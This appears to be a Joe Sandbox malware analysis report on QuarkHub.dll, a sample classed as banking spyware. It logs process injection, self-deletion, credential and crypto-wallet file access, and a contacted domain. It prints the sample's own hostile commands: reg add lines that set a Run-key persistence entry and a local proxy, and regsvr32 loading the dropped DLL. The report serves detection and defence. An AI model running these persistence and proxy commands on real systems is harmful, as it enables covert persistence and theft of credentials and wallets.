Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings" /f /t REG_SZ /v "ProxyServer" /d "127.0.0.1:10351"	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings" /f /t REG_DWORD /v "ProxyEnable" /d 1	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /t REG_SZ /v QuarkHub /d "regsvr32.exe /s \"C:\Users\user\AppData\Roaming\Pfjsqg\QuarkHub.dll\""	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe" /s "C:\Users\user\AppData\Roaming\Pfjsqg\QuarkHub.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe" /s "C:\Users\user\AppData\Roaming\Pfjsqg\QuarkHub.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0bf754aa-c967-445c-ab3d-d8fda9bae7ef}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: QuarkHub.dll

Static PE information: Image base 0x180000000 > 0x60000000

Source: QuarkHub.dll

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: ntdll.pdb source: loaddll64.exe, 00000000.00000003.1678680571.0000021657CDE000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1686383589.0000021657E83000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1677430084.0000021657F8E000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1678027414.0000021657F9F000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1682626997.0000021657FFE000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1680085192.0000021657CD4000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1690767966.0000021657CDC000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1681446175.0000021657CD7000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1682038640.0000021657E66000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1677834264.0000021657E3C000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1694916814.0000021657CD6000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1685367991.0000021657E8F000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1687529504.0000021657CD1000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1683769782.0000021657E68000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1692851906.0000021657CD8000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1692131329.0000021657EAF000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1683127159.0000021657CD1000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1684278185.0000021658005000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1677009444.0000021657CD0000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1678881926.0000021657E43000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1685936772.0000021657CD2000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1679667370.0000021657E54000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1691697319.0000021657CD1000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1690315962.000002165805A000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1686994972.000002165803F000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1695356073.0000021657ECD000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1680576343.0000021657E57000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1689577958.0000021657E92000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1691190794.0000021657EB7000.00000004.00000020.00020000.00000000.s
Source:	Binary string: ntdll.pdbUGP source: loaddll64.exe, 00000000.00000003.1678680571.0000021657CDE000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1686383589.0000021657E83000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1677430084.0000021657F8E000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1678027414.0000021657F9F000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1682626997.0000021657FFE000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1680085192.0000021657CD4000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1690767966.0000021657CDC000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1681446175.0000021657CD7000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1682038640.0000021657E66000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1677834264.0000021657E3C000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1694916814.0000021657CD6000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1685367991.0000021657E8F000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1687529504.0000021657CD1000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1683769782.0000021657E68000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1692851906.0000021657CD8000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1692131329.0000021657EAF000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1683127159.0000021657CD1000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1684278185.0000021658005000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1677009444.0000021657CD0000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1678881926.0000021657E43000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1685936772.0000021657CD2000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1679667370.0000021657E54000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1691697319.0000021657CD1000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1690315962.000002165805A000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1686994972.000002165803F000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1695356073.0000021657ECD000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1680576343.0000021657E57000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1689577958.0000021657E92000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1691190794.0000021657EB7000.00000004.00000020.00020000.0000000

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe" /s "C:\Users\user\AppData\Roaming\Pfjsqg\QuarkHub.dll

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\msiexec.exe	Process created: reg.exe
Source: C:\Windows\System32\msiexec.exe	Process created: reg.exe
Source: C:\Windows\explorer.exe	Process created: reg.exe
Source: C:\Windows\System32\msiexec.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: reg.exe	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Pfjsqg\QuarkHub.dll

Jump to dropped file

Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QuarkHub			Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QuarkHub			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\quarkhub.dll

Jump to behavior

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: ntdll.dll function: ZwCreateUserProcess new code: 0xE9 0x9F 0xF1 0x12 0x26 0x6F

Source: C:\Windows\System32\msiexec.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Hcdg Jnvykowz

Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\explorer.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 880			Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 871			Jump to behavior

Source: C:\Windows\System32\msiexec.exe TID: 7428	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 7984	Thread sleep count: 7416 > 30	Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 7984	Thread sleep time: -22248000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 7984	Thread sleep count: 1250 > 30	Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 7984	Thread sleep time: -3750000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7664	Thread sleep time: -35000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7668	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7660	Thread sleep time: -145000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7660	Thread sleep time: -167000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\msiexec.exe	Last function: Thread delayed
Source: C:\Windows\System32\msiexec.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\explorer.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Windows\System32\loaddll64.exe	Memory allocated: C:\Windows\System32\msiexec.exe base: 236D3BF0000 protect: page read and write	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory allocated: C:\Windows\System32\msiexec.exe base: 2A476300000 protect: page read and write	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory allocated: C:\Windows\System32\msiexec.exe base: 217CBEE0000 protect: page read and write	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Memory allocated: C:\Windows\System32\msiexec.exe base: 2AA1EF60000 protect: page read and write	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Memory allocated: C:\Windows\System32\msiexec.exe base: 248C0260000 protect: page read and write	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\msiexec.exe

Thread created: C:\Windows\explorer.exe EIP: E529160

Jump to behavior

DLL side loading technique detected

Source: C:\Windows\System32\loaddll64.exe	Section loaded: C:\Users\user\Desktop\QuarkHub.dll			Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Section loaded: C:\Users\user\Desktop\QuarkHub.dll			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\loaddll64.exe	Memory written: C:\Windows\System32\msiexec.exe base: 236D3BF0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory written: C:\Windows\System32\msiexec.exe base: 2A476300000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory written: C:\Windows\System32\msiexec.exe base: 217CBEE0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Memory written: C:\Windows\System32\msiexec.exe base: 283F4630000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Memory written: C:\Windows\System32\msiexec.exe base: 21925980000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Memory written: C:\Windows\explorer.exe base: E520000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Memory written: C:\Windows\SysWOW64\msiexec.exe base: 2FA0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Memory written: C:\Windows\SysWOW64\msiexec.exe base: 2B00000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Memory written: C:\Windows\SysWOW64\msiexec.exe base: 2A80000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Memory written: C:\Windows\SysWOW64\msiexec.exe base: 2F90000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Memory written: C:\Windows\System32\msiexec.exe base: 2DB3C0C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Memory written: C:\Windows\System32\msiexec.exe base: 2AA1EF60000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Memory written: C:\Windows\System32\msiexec.exe base: 234A0090000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Memory written: C:\Windows\System32\msiexec.exe base: 248C0260000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Memory written: C:\Windows\System32\msiexec.exe base: 28C5C730000 value starts with: 4D5A	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\msiexec.exe

Memory written: PID: 2580 base: E520000 value: 4D

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\loaddll64.exe	Thread register set: target process: 7464	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 7424	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 7432	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Thread register set: target process: 7564	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Thread register set: target process: 7620	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Thread register set: target process: 7088	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Thread register set: target process: 2336	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Thread register set: target process: 6952	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Thread register set: target process: 22964	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Thread register set: target process: 23088	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\loaddll64.exe	Memory written: C:\Windows\System32\msiexec.exe base: 236D3BF0000	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Memory written: C:\Windows\System32\msiexec.exe base: 236D3C194E2	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory written: C:\Windows\System32\msiexec.exe base: 2A476300000	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory written: C:\Windows\System32\msiexec.exe base: 2A4763294E2	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory written: C:\Windows\System32\msiexec.exe base: 217CBEE0000	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory written: C:\Windows\System32\msiexec.exe base: 217CBF094E2	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Memory written: C:\Windows\explorer.exe base: E520000	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Memory written: C:\Windows\SysWOW64\msiexec.exe base: 2FA0000	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Memory written: C:\Windows\SysWOW64\msiexec.exe base: 2B00000	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Memory written: C:\Windows\SysWOW64\msiexec.exe base: 2A80000	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Memory written: C:\Windows\SysWOW64\msiexec.exe base: 2F90000	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Memory written: C:\Windows\System32\msiexec.exe base: 2AA1EF60000	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Memory written: C:\Windows\System32\msiexec.exe base: 2AA1EF894E2	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Memory written: C:\Windows\System32\msiexec.exe base: 248C0260000	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Memory written: C:\Windows\System32\msiexec.exe base: 248C02894E2	Jump to behavior

Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\QuarkHub.dll",#1	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\electrum\wallets\	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\local storage\	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	1 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	611 Process Injection	1 Rootkit	1 OS Credential Dumping	1 Process Discovery	Remote Services	1 Credential API Hooking	Exfiltration Over Other Network Medium	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Abuse Accessibility Features	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	Scheduled Task/Job	11 DLL Side-Loading	1 Registry Run Keys / Startup Folder	1 Masquerading	1 Credential API Hooking	21 Virtualization/Sandbox Evasion	Remote Desktop Protocol	2 Browser Session Hijacking	Exfiltration Over Bluetooth	2 Non-Application Layer Protocol	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	At	Logon Script (Windows)	11 DLL Side-Loading	2 Modify Registry	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	2 Data from Local System	Automated Exfiltration	3 Application Layer Protocol			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	Cron	Login Hook	Login Hook	21 Virtualization/Sandbox Evasion	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	Protocol Impersonation			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	611 Process Injection	LSA Secrets	2 System Information Discovery	SSH	Keylogging	Scheduled Transfer	Fallback Channels			Data Encrypted for Impact	Server	Gather Victim Network Information
Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Regsvr32	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Data Transfer Size Limits	Multiband Communication			Service Stop	Botnet	Domain Properties
External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Rundll32	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over C2 Channel	Commonly Used Port			Inhibit System Recovery	Web Services	DNS
Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Exfiltration Over Alternative Protocol	Application Layer Protocol			Defacement	Serverless	Network Trust Dependencies
Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 File Deletion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Web Protocols			Internal Defacement	Malvertising	Network Topology

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
adslstickermo.world	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://adslstickermo.world/	0%	Avira URL Cloud	safe
https://adslstickermo.world/	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
adslstickermo.world	104.21.33.213	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://adslstickermo.world/	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.33.213	adslstickermo.world	United States		13335	CLOUDFLARENETUS	false
172.67.166.220	unknown	United States		13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	38.0.0 Ammolite
Analysis ID:	1369415
Start date and time:	2024-01-03 18:23:54 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	QuarkHub.dll
Detection:	MAL
Classification:	mal96.bank.adwa.spyw.evad.winDLL@49/38@2/3
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .dll

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.85.23.86, 40.68.123.157
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:26:02	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run QuarkHub regsvr32.exe /s "C:\Users\user\AppData\Roaming\Pfjsqg\QuarkHub.dll"
17:26:10	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run QuarkHub regsvr32.exe /s "C:\Users\user\AppData\Roaming\Pfjsqg\QuarkHub.dll"
18:24:54	API Interceptor	1347x Sleep call for process: explorer.exe modified
18:25:45	API Interceptor	16350x Sleep call for process: msiexec.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
